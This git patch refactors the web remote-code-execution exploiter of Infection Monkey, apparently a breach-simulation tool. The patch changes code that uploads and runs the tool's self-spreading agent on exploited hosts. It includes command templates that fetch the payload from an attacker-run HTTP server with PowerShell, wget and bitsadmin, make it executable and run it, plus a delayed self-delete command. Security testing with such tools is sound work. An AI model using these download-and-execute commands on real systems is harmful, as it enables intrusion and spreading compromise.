From 0d45a44d6b1600ef78da8d520898205a9b23c621 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 10 Aug 2018 15:07:56 +0300 Subject: [PATCH] Final, tested framework fixes --- infection_monkey/exploit/web_rce.py | 32 ++++++++++++++--------------- infection_monkey/model/__init__.py | 3 +-- 2 files changed, 16 insertions(+), 19 deletions(-) diff --git a/infection_monkey/exploit/web_rce.py b/infection_monkey/exploit/web_rce.py index d3ae83b6d..f99e4da52 100644 --- a/infection_monkey/exploit/web_rce.py +++ b/infection_monkey/exploit/web_rce.py @@ -107,7 +107,6 @@ class WebRCE(HostExploiter): else: extensions = [""] for port in ports: - extensions = [(e[1:] if '/' == e[0] else e) for e in extensions] for extension in extensions: if port[1]: protocol = "https" @@ -127,9 +126,12 @@ class WebRCE(HostExploiter): resp = self.exploit(url, ARCH_LINUX) if resp: # Pulls architecture string - # TODO TEST IF NOT FOUND arch = re.search('(?<=Architecture:)\s+(\w+)', resp) - arch = arch.group(1) + try: + arch = arch.group(1) + except AttributeError: + LOG.error("Looked for linux architecture but could not find it") + return False if arch: return arch else: @@ -167,7 +169,7 @@ class WebRCE(HostExploiter): else: paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64]) for path in paths: - if self.check_remote_file(url, path): + if self.check_remote_monkey_file(url, path): return True return False @@ -179,15 +181,15 @@ class WebRCE(HostExploiter): :param names: [] of service names. Example: ["http"] :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?] """ - ports = WebRCE.get_open_service_ports(self.host, ports, names) + ports = self.get_open_service_ports(ports, names) if not ports: LOG.info("All default web ports are closed on %r, skipping", host) return False else: return ports - def set_host_arch(self, exploiter, url): - arch = WebRCE.get_host_arch(exploiter, url) + def set_host_arch(self, url): + arch = self.get_host_arch(url) if not arch: LOG.error("Couldn't get host machine's architecture") return False @@ -203,7 +205,7 @@ class WebRCE(HostExploiter): :return: {'response': response/False, 'path': monkeys_path_in_host} """ LOG.info("Trying to upload monkey to the host.") - src_path = get_target_monkey(host) + src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False @@ -213,7 +215,7 @@ class WebRCE(HostExploiter): if not path: return False # Create server for http download and wait for it's startup. - http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) if not http_path: LOG.debug("Exploiter failed, http transfer creation failed.") return False @@ -223,10 +225,9 @@ class WebRCE(HostExploiter): return False # Choose command: if commands: - command = WebRCE.get_command(self.host, path, http_path, commands) + command = self.get_command(path, http_path, commands) else: - command = WebRCE.get_command(self.host, path, http_path, - {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}) + command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}) resp = self.exploit(url, command) @@ -283,10 +284,10 @@ class WebRCE(HostExploiter): LOG.info("Trying to execute remote monkey") # Get monkey command line if dropper and path: - monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1, path) + monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path) command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd} else: - monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1) + monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1) command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd} try: resp = self.exploit(url, command) @@ -306,6 +307,3 @@ class WebRCE(HostExploiter): return False LOG.info("Execution attempt finished") return resp - - - diff --git a/infection_monkey/model/__init__.py b/infection_monkey/model/__init__.py index 31bc77eb8..8b4f8d4ab 100644 --- a/infection_monkey/model/__init__.py +++ b/infection_monkey/model/__init__.py @@ -17,8 +17,7 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\"" -POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" +POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' CHMOD_MONKEY = "chmod +x %(monkey_path)s"